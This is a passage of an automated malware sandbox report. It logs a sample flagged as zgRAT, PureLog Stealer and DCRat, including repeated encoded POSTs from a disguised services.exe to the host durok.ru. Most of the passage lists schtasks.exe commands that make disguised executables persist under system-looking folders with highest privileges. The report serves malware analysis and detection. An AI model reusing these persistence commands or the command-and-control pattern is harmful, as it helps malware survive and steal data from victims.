                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4501&min_rtt=1735&rtt_var=6184&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=61167&cwnd=138&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
103         192.168.2.4  49968        104.21.93.162   80                2308  C:\Windows\GameBarPresenceWriter\services.exe
Timestamp                            Bytes transferred  Direction  Data
Dec 26, 2024 17:18:58.987138987 CET  307                OUT        POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:18:59.333756924 CET  2128               OUT        Data Raw: 59 5a 5e 51 51 5b 59 57 5e 58 52 54 56 5c 58 56 54 57 5b 54 56 54 53 59 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YZ^QQ[YW^XRTV\XVTW[TVTSYPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$Z<20^<:)"1'81=*[%7; ",:4E<0_)"Z.#Z*2
Dec 26, 2024 17:19:00.235542059 CET  25                 IN         HTTP/1.1 100 Continue
Dec 26, 2024 17:19:00.417484045 CET  949                IN         HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:19:00 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9EKVprfiuGN3pWkdgBJ0Y1pfC6GXSSp18hjIXqsnMDZgIoAw2jSsBnvWv%2Bkol5aLhzc0SomWC%2FGRaZwqoRDix2K8PpyXB0%2FnyF%2Bl%2FQ6m6QwhVriKO8Gjg38Img%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263d4fc8b4396-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4279&min_rtt=1735&rtt_var=5740&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=66084&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 5d 29 07 2c 0f 37 3c 02 56 3f 2e 26 1b 2a 21 3a 06 3c 0b 26 01 28 01 0c 10 2b 06 05 50 37 5c 35 03 3d 29 24 13 25 18 00 5c 32 0b 2e 5c 05 1d 27 5b 2b 2b 2b 06 33 0c 2d 59 3d 00 22 42 3d 2e 3d 5b 24 2f 24 03 20 15 0c 16 37 32 20 58 2f 12 34 59 2d 3c 20 1d 2a 20 32 1f 21 17 21 51 0c 1f 38 57 21 29 01 12 32 2d 29 57 22 0e 2b 12 26 01 3a 57 23 2b 0d 13 30 14 0e 01 27 23 05 55 22 3d 06 0c 3f 03 2a 5b 25 3f 0f 12 29 13 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$]),7<V?.&*!:<&(+P7\5=)$%\2.\'[+++3-Y="B=.=[$/$ 72 X/4Y-< * 2!!Q8W!)2-)W"+&:W#+0'#U"=?*[%?)%^-#T>TV0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
104         192.168.2.4  49971        104.21.93.162   80                2308  C:\Windows\GameBarPresenceWriter\services.exe
Timestamp                            Bytes transferred  Direction  Data
Dec 26, 2024 17:19:00.483310938 CET  307                OUT        POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:19:00.833734035 CET  2548               OUT        Data Raw: 59 51 5b 5c 51 5c 5c 51 5e 58 52 54 56 50 58 52 54 5d 5b 5e 56 5e 53 5b 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YQ[\Q\\Q^XRTVPXRT][^V^S[PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$(#+:&52^/-5W>'&[3B$7,,#?1-7?3*"Z.#Z*
Dec 26, 2024 17:19:01.661772966 CET  25                 IN         HTTP/1.1 100 Continue
Dec 26, 2024 17:19:01.913671017 CET  804                IN         HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:19:01 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TzLUp8e%2BkfEsapdqma8%2BXozXJOg2HQlrjn%2F8inSE0Mrv7IlOjVAM8J5GkaDPpWgiLCbr%2Bih3MKnyOv1xpouDLYeIo4vyDWTxA7b7PZE76diadqeOz%2BGUd%2FDr%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263de59964414-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4642&min_rtt=1738&rtt_var=6460&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=58467&cwnd=171&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
105         192.168.2.4  49974        104.21.93.162   80                2308  C:\Windows\GameBarPresenceWriter\services.exe
Timestamp                            Bytes transferred  Direction  Data
Dec 26, 2024 17:19:01.236841917 CET  307                OUT        POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:19:01.588527918 CET  2128               OUT        Data Raw: 5c 5a 5b 5c 51 5b 59 55 5e 58 52 54 56 5e 58 51 54 53 5b 55 56 56 53 59 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \Z[\Q[YU^XRTV^XQTS[UVVSYPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$[<1+9#2<,.6?'&0?4<P7!.)4E(\>%"Z.#Z*
Dec 26, 2024 17:19:02.417151928 CET  25                 IN         HTTP/1.1 100 Continue
Dec 26, 2024 17:19:02.697639942 CET  947                IN         HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:19:02 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fSdY7at1ZMD3frtRd9Sge2s4UV6j6c%2FFgZUelSwFrusc9LMn%2Fj7cMFv4V159q2rH2vEbqiuNZ4g1QnZA3SgbYmE8FY4CuytauyOVkmGCGbRyu2%2BWdOjv4OkLJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263e31aec8c69-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=10195&min_rtt=4331&rtt_var=13353&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=28489&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 27 01 3d 2a 3b 56 37 02 2c 1c 3f 04 3e 53 3d 31 25 14 3c 0b 32 07 28 2f 2e 1f 2a 3b 2f 18 20 3a 29 00 2a 03 2c 5c 25 18 35 05 32 0b 2e 5c 05 1d 27 5d 2b 2b 02 12 30 32 0f 5a 3e 2e 26 43 28 3d 21 18 27 2c 2c 01 37 15 2d 02 23 31 06 11 38 12 24 1d 3a 05 3f 00 3f 20 0c 5b 35 3d 21 51 0c 1f 38 53 35 39 28 03 26 58 3a 0e 35 30 37 56 25 16 00 57 22 38 3c 0f 33 2a 2f 59 26 33 23 54 23 3d 33 53 2a 2e 32 10 26 2c 29 5c 2b 29 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98'=*;V7,?>S=1%<2(/.*;/ :)*,\%52.\']++02Z>.&C(=!',,7-#18$:?? [5=!Q8S59(&X:507V%W"8<3*/Y&3#T#=3S*.2&,)\+)%^-#T>TV0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
106         192.168.2.4  49976        104.21.93.162   80                2308  C:\Windows\GameBarPresenceWriter\services.exe
Timestamp                            Bytes transferred  Direction  Data
Dec 26, 2024 17:19:02.495732069 CET  307                OUT        POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:19:02.849327087 CET  2548               OUT        Data Raw: 59 58 5b 5f 54 55 59 57 5e 58 52 54 56 51 58 50 54 53 5b 5e 56 5f 53 5a 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YX[_TUYW^XRTVQXPTS[^V_SZPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT')1<>9"5(^,&*4&070"<8Q"?:.\<(V )5"Z.#Z*
Dec 26, 2024 17:19:03.672945023 CET  25                 IN         HTTP/1.1 100 Continue
Dec 26, 2024 17:19:03.925323009 CET  795                IN         HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:19:03 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=90Yj7qIsX1JYHtb1p%2BKBjybAOrUb0eHIOOmIyEY1I2kok2N7K3M6inuHpXSfHcsJvcylFNQuJhYB7Q%2F77SUKikh8e1bUzryhfyBJ4J3rGvJIE7QYIdf7KlWxHA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263eaee5e42b5-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3199&min_rtt=1691&rtt_var=3651&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=106112&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
107         192.168.2.4  49981        104.21.93.162   80                2308  C:\Windows\GameBarPresenceWriter\services.exe
Timestamp                            Bytes transferred  Direction  Data
Dec 26, 2024 17:19:03.486768007 CET  307                OUT        POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:19:03.833729029 CET | 2128 | OUT | [2128-byte encoded request body]
Dec 26, 2024 17:19:04.664607048 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:19:04.917418003 CET | 945 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:19:04 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BHGVbMmIigEyyLY8SoSyEmZetIxxwPMGsVTzc0JhJIa1GdD5%2Bt63qyk1YeAdPIL%2FIECcv8ShdGTAIrJDPGklondZ9WoOyfM20XGSRta7wfxO0irhTRt9CYwE3w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263f118778c57-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4542&min_rtt=1983&rtt_var=5863&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=64998&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
108 | 192.168.2.4 | 49983 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:19:04.199542999 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2544
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:19:04.552719116 CET | 2544 | OUT | [2544-byte encoded request body]
Dec 26, 2024 17:19:05.377367973 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:19:05.673398972 CET | 799 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:19:05 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NJqRMcY8%2BePJtQV1yzdZfwiTXiNnGlWMFPwSm7caxCcAl6RcQF7STqr6ei%2BPklsqHiuMYwgK5txE4zy0vm%2FvFUnX6DfXRTlQcsIPFiKKIBnLtzj6nu%2BRTjBJ5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263f5994a8c21-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=7275&min_rtt=1989&rtt_var=11319&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2851&delivery_rate=32971&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Target ID:0
                                                                                                                              Start time:11:16:56
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Users\user\Desktop\Z4D3XAZ2jB.exe"
                                                                                                                              Imagebase:0x4a0000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000000.00000002.1739517961.000000001B1E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1739517961.000000001B1E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1721629037.0000000013120000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1721629037.000000001272D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              Target ID:1
                                                                                                                              Start time:11:17:00
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Windows\GameBarPresenceWriter\services.exe'" /f
                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:2
                                                                                                                              Start time:11:17:00
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Windows\GameBarPresenceWriter\services.exe'" /rl HIGHEST /f
                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:3
                                                                                                                              Start time:11:17:00
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Windows\GameBarPresenceWriter\services.exe'" /rl HIGHEST /f
                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:4
                                                                                                                              Start time:11:17:00
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 14 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe'" /f
                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:5
                                                                                                                              Start time:11:17:00
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFc" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f
                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:6
                                                                                                                              Start time:11:17:00
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 14 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f
                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:7
                                                                                                                              Start time:11:17:00
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\windows multimedia platform\ZDtOzYsYYWKWEhNYzFc.exe'" /f
                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:8
                                                                                                                              Start time:11:17:00
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFc" /sc ONLOGON /tr "'C:\Program Files (x86)\windows multimedia platform\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f
                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:9
                                                                                                                              Start time:11:17:00
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windows multimedia platform\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f
                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:10
                                                                                                                              Start time:11:17:00
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe'" /f
                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:11
                                                                                                                              Start time:11:17:00
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFc" /sc ONLOGON /tr "'C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f
                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:12
                                                                                                                              Start time:11:17:00
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f
                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
